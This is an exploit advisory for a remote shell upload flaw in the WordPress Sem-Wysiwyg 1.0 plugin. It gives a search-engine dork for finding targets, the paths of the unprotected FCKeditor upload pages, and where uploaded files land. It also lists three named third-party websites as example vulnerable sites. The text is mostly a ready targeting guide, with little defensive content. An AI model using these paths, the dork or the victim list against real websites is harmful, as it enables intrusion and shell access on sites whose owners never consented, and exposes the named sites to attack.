################################################################################################# # Exploit Title : WordPress Sem-Wysiwyg Plugins 1.0 Remote Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 20/12/2018 # Vendor Homepage : wordpress.org # Software Download Link : N/A # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.0 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/plugins/sem-wysiwyg/fckeditor/'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434- [ Unrestricted Upload of File with Dangerous Type ] # Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ] ################################################################################################# # Exploit : /wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html /wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/connectors/test.html /wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/frmupload.html # Directory File Path : /wp-content/uploads/..... /wp-content/uploads/[YEAR]/[MONTH]/..... ################################################################################################# # Note : This plugin Sem-Wysiwyg contains a very serious vulnerability that allowed hackers to gain full control a modify, upload and execute files on any website running WordPress. With the plugin installed on a certain website, a hacker or malicious person can gain access to the web server via HTTP through a backdoor in the pluginas directory. ################################################################################################# # Example Vulnerable Sites => [+] peaceofmindbook.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html [+] americanpathways.edu/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html [+] worklessmakemore.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################